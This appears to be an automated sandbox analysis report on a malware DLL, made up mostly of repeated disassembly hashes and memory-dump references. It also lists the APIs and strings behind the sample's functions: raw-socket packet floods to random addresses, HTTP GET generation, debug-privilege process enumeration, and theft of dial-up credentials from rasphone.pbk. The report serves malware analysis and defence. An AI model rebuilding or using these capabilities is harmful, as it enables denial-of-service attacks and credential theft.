                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 592814870bf17417fb5b6984e4e869b2722be812bfe63a8867c354a240cf542b
                        • Instruction ID: 1521cd4daf1106318aef7bf16b33a04af3201cfd09e5fc1819287436f51d2391
                        • Opcode Fuzzy Hash: 592814870bf17417fb5b6984e4e869b2722be812bfe63a8867c354a240cf542b
                        • Instruction Fuzzy Hash: B7A161B2A097168FC300CF1DC88064AF7E2FFD8344F4A8A2DE5949B755D7B5A916CB81
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d58346aee366f9f8d47a19bdb072ea82d15677116cfc64d8b59b18ba78e9553
                        • Instruction ID: 476288f412c14077fcd9071d6b15e503cfc6eeff572ef019786c4c249033299e
                        • Opcode Fuzzy Hash: 7d58346aee366f9f8d47a19bdb072ea82d15677116cfc64d8b59b18ba78e9553
                        • Instruction Fuzzy Hash: F091EC6013AF724EDBC7EE719140951F3A1BF5621F70909AAC515DF531EB3E934EA220
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a4ca654f5ef816b89f2d99af02dfef9d03999c954678c7b020c586049b3efc1
                        • Instruction ID: d3a25fbe4f482a37ddb047c09cdff58c5b6e8acf2d71e81cfe455ebad183f9e1
                        • Opcode Fuzzy Hash: 5a4ca654f5ef816b89f2d99af02dfef9d03999c954678c7b020c586049b3efc1
                        • Instruction Fuzzy Hash: 1E914C716087814FC318CF6DC89056AFBE2FFCA304F29867EE589C7365DA75D8068A46
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79ce37fae2807b3639ff367ef943e12677a29e926d77833f75003cd284ccba2e
                        • Instruction ID: 1187c1523a53f7dd17f3ebd1d03762e7b739d767cd46b8384c164c48c26d8907
                        • Opcode Fuzzy Hash: 79ce37fae2807b3639ff367ef943e12677a29e926d77833f75003cd284ccba2e
                        • Instruction Fuzzy Hash: FE91F22164D7824EC311CFBE88D05D5FFE3AEEA10978ED6E885C84F25BD5B2A11D8790
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac7cf2e520c0a9ce05f912ce1016ba3fdc60f8124ee6bf726c9368fef9dcaac2
                        • Instruction ID: 1f3d20b7f3567cdd5f1825b0278f434c9e4b41ceb9b4ca97bda2078198a10693
                        • Opcode Fuzzy Hash: ac7cf2e520c0a9ce05f912ce1016ba3fdc60f8124ee6bf726c9368fef9dcaac2
                        • Instruction Fuzzy Hash: 36919960239FB38DDBD3EE709100811E3A1BF9621EB050AAAC514DF531DF7E934EA260
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be16ef9ea0e9a81022fe0df15ef6331927efd347d7d06f56019efce088b727d0
                        • Instruction ID: 4001a47fa68a78da59f3708ddbd07abc5be5d151f38a6b09be0854e12cee3099
                        • Opcode Fuzzy Hash: be16ef9ea0e9a81022fe0df15ef6331927efd347d7d06f56019efce088b727d0
                        • Instruction Fuzzy Hash: BA91D1B16083498FC714CF5DD8C059AFBE2FFC9244F498A3CE98947356E631AA19CB85
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7067bea4396675e07450fd61cafd9ebcaaf9b55f0194bc15b59cf99f5b35057e
                        • Instruction ID: 7aaae51a650b1b801c99fa213e8d74ab15c848da6f3fcb1286307a4e25a2ac93
                        • Opcode Fuzzy Hash: 7067bea4396675e07450fd61cafd9ebcaaf9b55f0194bc15b59cf99f5b35057e
                        • Instruction Fuzzy Hash: 4991AEB1A083498FC714CF5DD8C059AFBE2FFC9204F49863CE98947356E671AA19CB85
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b113501385df7fbc9493c044003d8c1f6fa9f59bad1b6cedd56b115360b304b
                        • Instruction ID: 4a4733d688bc83438372dfada43c5f00a7cd87cd11c44f9a45f8a2d7dd5a9950
                        • Opcode Fuzzy Hash: 7b113501385df7fbc9493c044003d8c1f6fa9f59bad1b6cedd56b115360b304b
                        • Instruction Fuzzy Hash: D691AEB16083498FC714CF5DD8C059AFBE2FFC9244F498A3CE98947356E631AA19CB85
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 38d42f1ced68ac7dd22ef522247664a6e127408bab9776071e8779e9f22eec38
                        • Instruction ID: 52f05766b68d218f2e1eb83800da6b07f952b32f9ecf6b5bbe24c8b08d036710
                        • Opcode Fuzzy Hash: 38d42f1ced68ac7dd22ef522247664a6e127408bab9776071e8779e9f22eec38
                        • Instruction Fuzzy Hash: AE91C371A083598FC314CF5DC8C059AFBE2FFC9244F498A7CE98847356E671AA19CB81
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 965a542232f1dd0b70b9e2dcbef6b67194818e225c4852a6eddee7daa403e6b8
                        • Instruction ID: bb77a65886b5e5825c7a4975c9596a30c7da6a05c916aee0e9bc824dda191490
                        • Opcode Fuzzy Hash: 965a542232f1dd0b70b9e2dcbef6b67194818e225c4852a6eddee7daa403e6b8
                        • Instruction Fuzzy Hash: A491B1716083498FC714CF5DD8C059AFBE2FFC9204F49863CE98947356E671AA19CB85
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0bd193b3ac55b878715c98c9c2b8c9d68b60b2f42f32fbe3f2d8af7f16d99cf5
                        • Instruction ID: 7fecccd0274f13ca3b8af9f2f62569e23b127551c731bedde5d083baa0b2af44
                        • Opcode Fuzzy Hash: 0bd193b3ac55b878715c98c9c2b8c9d68b60b2f42f32fbe3f2d8af7f16d99cf5
                        • Instruction Fuzzy Hash: 42813831A083418FD308CF19C99051EFBE2FFC8354F59896EE9859B366D670E909CB86
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5a0899d4c262629a25ab5327572a1e5efbf49deb2bf57e201ffbb7e3162e0d1c
                        • Instruction ID: b5e338ba629c431d4c96250c4b556f2d3f5721661fff71b9487f04465846ff83
                        • Opcode Fuzzy Hash: 5a0899d4c262629a25ab5327572a1e5efbf49deb2bf57e201ffbb7e3162e0d1c
                        • Instruction Fuzzy Hash: 6C71A566425F26D2D7C3EB388150C55F354BF40390F950F69C8299B416DB3FEACE92A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 62568a51b40e9f63ba8ee7a9a2b5cb2374421f6dcdbbd0ad8e0099223546cf0d
                        • Instruction ID: 8a4a29ad2cd63c4cfe50ee1af54451edad381f14c3d5eb7c4d5eeeea3967df69
                        • Opcode Fuzzy Hash: 62568a51b40e9f63ba8ee7a9a2b5cb2374421f6dcdbbd0ad8e0099223546cf0d
                        • Instruction Fuzzy Hash: E9614A3024D3804BC309CF6998A15ABFFE2AF9E218F4DDABCE9D947702C664A5198705
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8e29b8d15aa06281ee2d73fdc0c5dae6ad4836f8517f533a5af10f7615ea94e2
                        • Instruction ID: 0e04410a94e206330b007c3ed95202fbb05aa0c569fd8de5ac5c30cef62d7f6a
                        • Opcode Fuzzy Hash: 8e29b8d15aa06281ee2d73fdc0c5dae6ad4836f8517f533a5af10f7615ea94e2
                        • Instruction Fuzzy Hash: 1F51302160D7834EC325CF7A88D05D6FFE35EEA00875ED6B889C84B69BD5B2A00EC254
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                        Similarity
                        • API ID: htons$strcspn$strstr$inet_addr$strncpy$htonlsetsockopt$CountSleepSocketTickprintfrandsendtowsprintf
                        • String ID: %d.%d.%d.%d$192.168.1.244$@$E$P$http://
                        • API String ID: 322722939-1061493658
                        Strings
                        • %s, xrefs: 1000559D
                        • http://, xrefs: 10005384, 100053D5, 100053E4
                        • %s, xrefs: 100055FA
                        • GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-, xrefs: 100055E6
                        Similarity
                        • API ID: strcspn$printfstrstr$ExitThreadUserclosesocketstrncpy$Sleepinet_addr$connectgethostbynamehtonsinet_ntoasendsocketsprintf
                        • String ID: %s$%s$GET %s HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/chpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: zh-cnAccept-Encoding: gzip, deflateIf-Modified-$http://
                        • API String ID: 3360081097-1844242639
                        Similarity
                        • API ID: strcspn$strstr$printfstrncpy$CountExitThreadTickUserinet_addr$CleanupSleepSocketclosesocketgethostbynameinet_ntoarandsendtosetsockoptsrandtime
                        • String ID: %s$http://
                        • API String ID: 2910787541-1591606595
                        APIs
                          • Part of subcall function 10012110: GetCurrentProcess.KERNEL32(00000028,?,?,10009E80,?,00000000,00000000,00000001), ref: 10012120
                          • Part of subcall function 10012110: OpenProcessToken.ADVAPI32(00000000,?,10009E80,?,00000000,00000000,00000001), ref: 10012127
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00001F40,00001F40), ref: 10011B66
                        • LocalAlloc.KERNEL32 ref: 10011B94
                        • Sleep.KERNEL32(00000001), ref: 10011BA9
                        • Process32First.KERNEL32(00000000,?), ref: 10011BB8
                        • OpenProcess.KERNEL32(00000410,00000000,?,?,00000000,?), ref: 10011BDB
                        • EnumProcessModules.PSAPI(00000000,00000040,00000004,?,?,00000000,?), ref: 10011C15
                        • GetModuleFileNameExA.PSAPI(00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011C2D
                        • GetPriorityClass.KERNEL32(00000000,00000000,00000040,?,00000104,00000000,00000040,00000004,?,?,00000000,?), ref: 10011C39
                        • wsprintfA.USER32 ref: 10011CCF
                        • lstrlen.KERNEL32(?,?,?,?,00000002,00000000,00001F40,00001F40), ref: 10011D05
                        • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011D0E
                        • lstrlen.KERNEL32(?,?,00000002,00000000,00001F40,00001F40), ref: 10011D17
                        Similarity
                        • API ID: Process$lstrlen$Open$AllocClassCreateCurrentEnumFileFirstLocalModuleModulesNamePriorityProcess32SleepSnapshotTokenToolhelp32wsprintf
                        • String ID: SYSTEM$SeDebugPrivilege
                        • API String ID: 1285126458-3052852743
                        • Opcode ID: cadeee9a5e2820c0af49ea328f1374500f2b17df7cea98c9d96a0cb35abb7eb5
                        • Instruction ID: d154a38f26d894026ef36b3ba2938c2b01a41688b9bbe616a0cc2585f5df2313
                        • Opcode Fuzzy Hash: cadeee9a5e2820c0af49ea328f1374500f2b17df7cea98c9d96a0cb35abb7eb5
                        • Instruction Fuzzy Hash: 94B192716083459FE715DB24CC81AEFB3E6FBC4704F404A2CFA8597240EA79E949CB96
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strcspn$strstr$strncpy$ExitThreadUserinet_addr$Sleepclosesocketgethostbynamehtonsprintfrandsendtosocketsrandtime
                        • String ID: %s:%d$http://
                        • API String ID: 3986318173-1702654977
                        • Opcode ID: 4a1080f91223798ebd142b12136c7072a719d38d081efe28d831db6d46336a97
                        • Instruction ID: 90b36a3bd682306f4a117e064a3fd4b30ecd2e8c0df95ca9b29892d3dab6f999
                        • Opcode Fuzzy Hash: 4a1080f91223798ebd142b12136c7072a719d38d081efe28d831db6d46336a97
                        • Instruction Fuzzy Hash: 128127315043505BE304DB748C88AAB7BEAEFC8354F048A1DFA9693290DFB5DE08C795
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: rand$htons$inet_addrsetsockopt$ExitSleepSocketStartupThreadUserhtonlsendtosprintf
                        • String ID: %d.%d.%d.%d$@$E$P
                        • API String ID: 872198723-1098802344
                        • Opcode ID: 33de09a9403d8de389e9fdb54a7ceb08891698b7f3ea9059b18b1a0a33c038fa
                        • Instruction ID: 4c19716b2acf436438f05bd1e09d835f5a48b7f7dcfd486cac9719d8a7d1c512
                        • Opcode Fuzzy Hash: 33de09a9403d8de389e9fdb54a7ceb08891698b7f3ea9059b18b1a0a33c038fa
                        • Instruction Fuzzy Hash: 7B81BE70148381AAE350DF24CC45BAFB7E6FFC9704F00891DF699972A1DAB49909CB5B
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000105), ref: 10007659
                        • strchr.MSVCRT ref: 1000766E
                        • lstrcpy.KERNEL32(00000001), ref: 10007679
                        • lstrcat.KERNEL32(?,?), ref: 10007691
                        • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 100076A0
                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 100076B0
                        • wsprintfA.USER32 ref: 100076D0
                        • GetVersionExA.KERNEL32 ref: 100076FC
                        • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10007722
                        • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,?), ref: 10007758
                        • GetPrivateProfileStringA.KERNEL32(00000000,DialParamsUID,00000000,?,00000100,?), ref: 100077D5
                        • lstrcmp.KERNEL32(?,00000000), ref: 100077FA
                        • lstrcpy.KERNEL32(?,00000200), ref: 10007835
                        • lstrcpy.KERNEL32(?,00000100), ref: 1000784A
                        • GetPrivateProfileStringA.KERNEL32(00000000,PhoneNumber,00000000,?,00000100,?), ref: 1000787E
                        • GetPrivateProfileStringA.KERNEL32(00000000,Device,00000000,?,00000100,?), ref: 10007896
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078E5
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078EB
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
                        • lstrlen.KERNEL32(00000000,?,00000000,?,?), ref: 100078FA
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000792D
                          • Part of subcall function 10007560: wsprintfA.USER32 ref: 100075CC
                          • Part of subcall function 10007560: LsaFreeMemory.ADVAPI32(?), ref: 100075FA
                          • Part of subcall function 10007560: LsaFreeMemory.ADVAPI32(?), ref: 10007624
                        Strings
                        • DialParamsUID, xrefs: 100077CF
                        • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 1000769A
                        • %s\%s, xrefs: 100076CA
                        • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 100076BD
                        • Documents and Settings\, xrefs: 1000765F
                        • PhoneNumber, xrefs: 10007878
                        • Device, xrefs: 10007890
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
